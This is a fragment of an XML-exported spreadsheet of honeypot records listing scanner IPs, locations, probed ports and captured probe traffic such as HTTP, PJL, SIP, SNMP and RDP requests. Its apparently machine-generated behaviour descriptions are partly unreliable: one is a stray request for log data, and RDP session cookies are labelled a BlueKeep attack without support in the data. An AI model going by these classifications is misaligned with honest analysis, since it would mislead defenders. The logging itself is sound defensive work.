        <s v="abuse@godaddy.com"/>
        <s v="staff@thnic.co.th"/>
        <s v="domain.operations@web.com"/>
        <s v="['registrar@nameshield.net', 'webmaster@bouyguestelecom.fr', 'dnsextmaster@bouyguestelecom.fr']"/>
        <s v="['domainabuse@cscglobal.com', 'domain.admin@pccw.com']"/>
        <s v="['abuse@whc.ca', 'emil@whc.ca', 'corp@whc.ca']"/>
        <s v="['domainabuse@tucows.com', 'ABUSE@ENOM.COM']"/>
        <s v="['abuse@joker.com', 'support@blixsolutions.no']"/>
        <s v="['domainabuse@cscglobal.com', 'domains@talktalkplc.com']"/>
        <s v="['abuse@webnames.ca', 'domadmin@rci.rogers.com']"/>
        <s v="abuse@gmo.jp"/>
        <s v="foreign@net-chinese.com.tw"/>
        <s v="abuse-contact@publicdomainregistry.com"/>
        <s v="abuse@imena.ua"/>
        <s v="abuse@nominalia.com"/>
        <s v="!misha@sdnge.com"/>
        <s v="domainabuse@cscglobal.com"/>
        <s v="abuse@name.com"/>
        <s v="['domainabuse@cscglobal.com', 'domainlegalcontact@verizon.com']"/>
        <s v="domainabuse@tucows.com"/>
      </sharedItems>
    </cacheField>
    <cacheField name="Domain_Registrant_Contact" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="Domain_Registrant_Address" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="ipv6" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="comment" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="confidence_3rd_party" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="behaviour_severity" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="behaviour_desc" numFmtId="0">
      <sharedItems containsBlank="1" longText="1"/>
    </cacheField>
    <cacheField name="behaviour_attack_indicator" numFmtId="0">
      <sharedItems containsBlank="1"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81">
  <r>
    <x v="0"/>
    <x v="0"/>
    <s v="sh-ams-nl-gp1-wk139a.internet-census.org&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T23:59:42"/>
    <d v="2024-06-14T18:15:24"/>
    <d v="2025-04-30T23:59:42"/>
    <n v="291"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;SIP Email Impersonation"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H23&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_POP3_H23&amp;&amp;SMA-LAB_POSTGRES_H45&amp;&amp;SMA-LAB_PJL_H15&amp;&amp;SMA-LAB_MSSQL_H31&amp;&amp;SMA-LAB_REDIS_H47&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_ORACLE_H2&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_REDIS_H43&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_HTTPS_H4&amp;&amp;SMA-LAB_SMB_H39&amp;&amp;SMA-LAB_MYSQL_H9&amp;&amp;SMA-LAB_LDAP_H15&amp;&amp;SMA-LAB_SIP_H15&amp;&amp;SMA-LAB_ORACLE_H36&amp;&amp;SMA-LAB_MYSQL_H25&amp;&amp;SMA-LAB_SMB_H3&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_PJL_H34&amp;&amp;SMA-LAB_IRC_H17&amp;&amp;SMA-LAB_LDAP_H36&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_SIP_H24&amp;&amp;SMA-LAB_SMB_H22&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_HTTPS_H18&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_SNMP_H22&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_FTP_H27&amp;&amp;SMA-LAB_MYSQL_H24&amp;&amp;SMA-LAB_LDAP_H46"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;21&amp;&amp;110&amp;&amp;5432&amp;&amp;9100&amp;&amp;1433&amp;&amp;6379&amp;&amp;18757&amp;&amp;1521&amp;&amp;1433&amp;&amp;6379&amp;&amp;321&amp;&amp;443&amp;&amp;445&amp;&amp;3306&amp;&amp;NA&amp;&amp;3306&amp;&amp;445&amp;&amp;3501&amp;&amp;6667&amp;&amp;5900&amp;&amp;161&amp;&amp;23&amp;&amp;143&amp;&amp;21432&amp;&amp;13471"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="108"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="NH"/>
    <s v="North Holland"/>
    <s v="Gemeente Amsterdam"/>
    <s v="Amsterdam"/>
    <s v="2759794"/>
    <s v="1012"/>
    <s v="52.3676"/>
    <s v="4.90414"/>
    <s v="211680"/>
    <s v="NSEC - Sistemas Informaticos, S.A."/>
    <s v="NSEC - Sistemas Informaticos, S.A."/>
    <s v="business"/>
    <s v="Inap AMS"/>
    <s v="2019-09-20"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;query&amp;&amp;command&amp;&amp;NA&amp;&amp;login&amp;&amp;request"/>
    <s v="NA&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 193.57.138.110:9100_x000d__x000a_User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'SSH-2.0-Go_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1 _x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'JCDL0'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'GCLF0'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'PEPI0'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_@PJL INFO ID_x000d__x000a_@PJL INFO PRODINFO_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 156.244.8.69:9100_x000d__x000a_User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'SSH-2.0-Go_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1 _x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=45.156.128.81;rport=53266'}}&amp;&amp;{Data_IRC:{'command': 'SSH-2.0-GO', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0 1.3.6.1.2.1.1.2.0 1.3.6.1.2.1.1.3.0 1.3.6.1.2.1.1.4.0 1.3.6.1.2.1.1.5.0 1.3.6.1.2.1.1.6.0 1.3.6.1.2.1.1.7.0', 'version': '1'}}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'CLNP0'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=45.156.128.81;rport=56867'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d9c:8051"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;Medium"/>
    <s v="No log data provided, unable to analyze or describe malicious activity. &amp;&amp; No available log data provided, cannot analyze activity. &amp;&amp; There is insufficient information to analyze possible malicious activity. &amp;&amp; A GET request was made to the root directory of the system with an HTTP version of 1.1, indicating a potential scanning or reconnaissance attempt. _x000a_The attacker may be trying to identify available services and directories on the system._x000a_This could be an initial step in a more malicious attack. &amp;&amp; Possible malicious activity involves an unauthorized GET request to the root directory of the system, indicating potential reconnaissance or exploitation attempts. This could be a preparatory step for further attacks. The request appears to be coming from an unknown or untrusted source."/>
    <s v="I need some log data to analyze! Please provide the log data for me to identify the types of attacks. &amp;&amp; Port Scan &amp;&amp; Web Scanning"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T23:58:42"/>
    <d v="2025-04-30T23:57:58"/>
    <d v="2025-04-30T23:58:42"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="VE"/>
    <s v="Venezuela"/>
    <s v="V"/>
    <s v="Zulia"/>
    <s v="Maracaibo Municipality"/>
    <s v="Maracaibo"/>
    <s v="3633009"/>
    <s v="NA"/>
    <s v="10.6666"/>
    <s v="-71.6124"/>
    <s v="61461"/>
    <s v="Airtek Solutions C.A."/>
    <s v="Airtek Solutions C.A."/>
    <s v="business"/>
    <s v="Corporacion Matrix TV, C.A."/>
    <s v="1991-04-16"/>
    <s v="COGENT-A"/>
    <s v="2023-10-11"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2619:b02e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2"/>
    <x v="2"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T23:50:42"/>
    <d v="2025-04-30T23:50:42"/>
    <d v="2025-04-30T23:50:42"/>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f8:5b9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3"/>
    <x v="3"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T23:47:42"/>
    <d v="2024-06-03T17:26:00"/>
    <d v="2025-04-30T23:47:42"/>
    <n v="282"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H4&amp;&amp;SMA-LAB_LDAP_H8&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_HTTPS_H42&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H14"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;389&amp;&amp;6688&amp;&amp;443&amp;&amp;20934&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Bang Khun Thian"/>
    <s v="Bang Khun Thian"/>
    <s v="1619485"/>
    <s v="NA"/>
    <s v="13.663"/>
    <s v="100.434"/>
    <s v="45758"/>
    <s v="Triple T Broadband Public Company Limited"/>
    <s v="Triple T Broadband Public Company Limited"/>
    <s v="residential"/>
    <s v="Triple T Broadband Public Company Limited"/>
    <s v="2009-09-16"/>
    <s v="TTBP-TH"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b4b7:f708"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="4"/>
    <x v="4"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T23:47:20"/>
    <d v="2024-07-08T13:41:00"/>
    <d v="2025-04-30T23:47:20"/>
    <n v="358"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_RDP_H21&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_ORACLE_H23&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_MYSQL_H47&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_IMAP_H18&amp;&amp;SMA-LAB_REDIS_H29&amp;&amp;SMA-LAB_LDAP_H36&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_MSSQL_H41&amp;&amp;SMA-LAB_HTTP_H27&amp;&amp;SMA-LAB_IRC_H14&amp;&amp;SMA-LAB_RDP_H37&amp;&amp;SMA-LAB_RDP_H27&amp;&amp;SMA-LAB_SNMP_H40&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_SNMP_H32&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_IMAP_H13&amp;&amp;SMA-LAB_ORACLE_H12&amp;&amp;SMA-LAB_LDAP_H45&amp;&amp;SMA-LAB_MYSQL_H16&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_IMAP_H47&amp;&amp;SMA-LAB_IRC_H9&amp;&amp;SMA-LAB_SOCKS5_H38&amp;&amp;SMA-LAB_SOCKS5_H8&amp;&amp;SMA-LAB_LDAP_H30&amp;&amp;SMA-LAB_POP3_H41&amp;&amp;SMA-LAB_REDIS_H21&amp;&amp;SMA-LAB_SNMP_H36&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_FTP_H14&amp;&amp;SMA-LAB_POP3_H21&amp;&amp;SMA-LAB_FTP_H7&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_HTTPS_H28&amp;&amp;SMA-LAB_PJL_H21&amp;&amp;SMA-LAB_PJL_H18&amp;&amp;SMA-LAB_MYSQL_H34&amp;&amp;SMA-LAB_IMAP_H8&amp;&amp;SMA-LAB_SNMP_H25&amp;&amp;SMA-LAB_RDP_H15&amp;&amp;SMA-LAB_POSTGRES_H19&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_SOCKS5_H35&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_HTTPS_H19&amp;&amp;SMA-LAB_POP3_H28&amp;&amp;SMA-LAB_SOCKS5_H13&amp;&amp;SMA-LAB_SNMP_H17&amp;&amp;SMA-LAB_SIP_H32&amp;&amp;SMA-LAB_MSSQL_H22&amp;&amp;SMA-LAB_MSSQL_H21&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_IMAP_H26&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_RDP_H25&amp;&amp;SMA-LAB_ORACLE_H24&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_LDAP_H21&amp;&amp;SMA-LAB_FTP_H17&amp;&amp;SMA-LAB_POP3_H23&amp;&amp;SMA-LAB_SNMP_H14&amp;&amp;SMA-LAB_POP3_H24&amp;&amp;SMA-LAB_LDAP_H15&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_POP3_H29&amp;&amp;SMA-LAB_POP3_H32&amp;&amp;SMA-LAB_POSTGRES_H11&amp;&amp;SMA-LAB_MYSQL_H27&amp;&amp;SMA-LAB_REDIS_H3&amp;&amp;SMA-LAB_MYSQL_H44&amp;&amp;SMA-LAB_SOCKS5_H28&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_NTP_H30&amp;&amp;SMA-LAB_LDAP_H31&amp;&amp;SMA-LAB_POSTGRES_H41&amp;&amp;SMA-LAB_NTP_H11&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_ORACLE_H25&amp;&amp;SMA-LAB_MSSQL_H9&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_FTP_H40&amp;&amp;SMA-LAB_MYSQL_H15&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_SIP_H40&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_LDAP_H34&amp;&amp;SMA-LAB_MYSQL_H19&amp;&amp;SMA-LAB_SIP_H8&amp;&amp;SMA-LAB_LDAP_H10&amp;&amp;SMA-LAB_PJL_H35&amp;&amp;SMA-LAB_PJL_H7"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;57004&amp;&amp;3389&amp;&amp;80&amp;&amp;6427&amp;&amp;1521&amp;&amp;23&amp;&amp;3306&amp;&amp;9100&amp;&amp;1433&amp;&amp;6379&amp;&amp;6667&amp;&amp;161&amp;&amp;1080&amp;&amp;110&amp;&amp;443&amp;&amp;5432&amp;&amp;NA&amp;&amp;445&amp;&amp;389&amp;&amp;21&amp;&amp;50815&amp;&amp;55034&amp;&amp;143&amp;&amp;55709&amp;&amp;5900&amp;&amp;49626&amp;&amp;52366&amp;&amp;55562"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2023-09-07"/>
    <s v="PAN-22"/>
    <s v="2023-09-07"/>
    <s v="query&amp;&amp;connection&amp;&amp;GET&amp;&amp;NA&amp;&amp;command&amp;&amp;request&amp;&amp;stshash"/>
    <s v="NA&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,57974)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,57984)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,57994)}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,64344)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,64350)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,64364)}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=pCnaJSKzd'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=wwssDX'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=wABQdl'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ftwdiKXfY'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=sCIyNL'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=nYVUqK'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,60086)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,60098)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,60106)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=acOnJgDRk'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=XgJjUg'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=EdRyGp'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,60574)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,60590)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,60592)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UDmvynDcv'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=DETLJl'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CgCJWf'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,61432)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,61436)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.249,61450)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=MDzdJmUiH'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:93b9:84f9"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="It appears that the attacker is scanning and probing various services on a network, likely for vulnerabilities or to gain unauthorized access. They are sending requests to different protocols such as DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, RDP, SIP, SMB, SMTP, SNMP, and attempting to authenticate or exploit potential weaknesses. &amp;&amp; Possible malicious activity: The system is being accessed through Remote Desktop Protocol (RDP). Attempts to establish unauthorized RDP connections may indicate hacking or malware activity. &amp;&amp; This indicates an attempt to enumerate valid accounts through brute-force RDP login attempts with the session hash likely being used for tracking legitimate or malicious users. _x000a_The presence of a session hash suggests the attacker is attempting to maintain persistence and potentially escalate privileges within the system._x000a_Further investigation into the source IP address and other related data would be necessary to determine the full extent of the activity. &amp;&amp; This indicates an attempt to bruteforce or crack the Remote Desktop Protocol (RDP) password, using a malicious tool that attempts to inject a known good hash as part of the authentication process. This could be an automated attack or a manual attempt by an attacker to bypass security measures. The presence of 'mstshash' suggests a Windows-based system is being targeted. &amp;&amp; The server is being targeted by an attacker attempting to exploit a potential PostgreSQL database vulnerability, possibly for unauthorized access or data theft. This could be a reconnaissance attempt to identify vulnerable systems. The goal of this activity is likely to gain unauthorized access to sensitive data. &amp;&amp; Unknown database access attempted, possibly a brute-force attack or unauthorized query execution. No valid credentials provided for Oracle database connection. Possible malicious intent to extract sensitive information. &amp;&amp; Unknown activity detected for Oracle service, possible probing or scanning attempt. No explicit malicious action observed. Data indicates incomplete or unsuccessful operation."/>
    <s v="  &amp;&amp; BruteForce &amp;&amp; BlueKeep Attack &amp;&amp; Rdp Bruteforce"/>
  </r>
  <r>
    <x v="5"/>
    <x v="5"/>
    <s v="mx-ll-223.205.61-222.dynamic.3bb.co.th"/>
    <x v="0"/>
    <d v="2025-04-30T23:45:39"/>
    <d v="2025-04-30T23:45:39"/>
    <d v="2025-04-30T23:45:39"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="12"/>
    <s v="Nonthaburi"/>
    <s v="Pak Kret"/>
    <s v="Pak Kret"/>
    <s v="1608048"/>
    <s v="11120"/>
    <s v="13.8995"/>
    <s v="100.543"/>
    <s v="45758"/>
    <s v="TTBP-AS-AP"/>
    <s v="Triple T Broadband Public Company Limited"/>
    <s v="consumer"/>
    <s v="Triple T Broadband Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
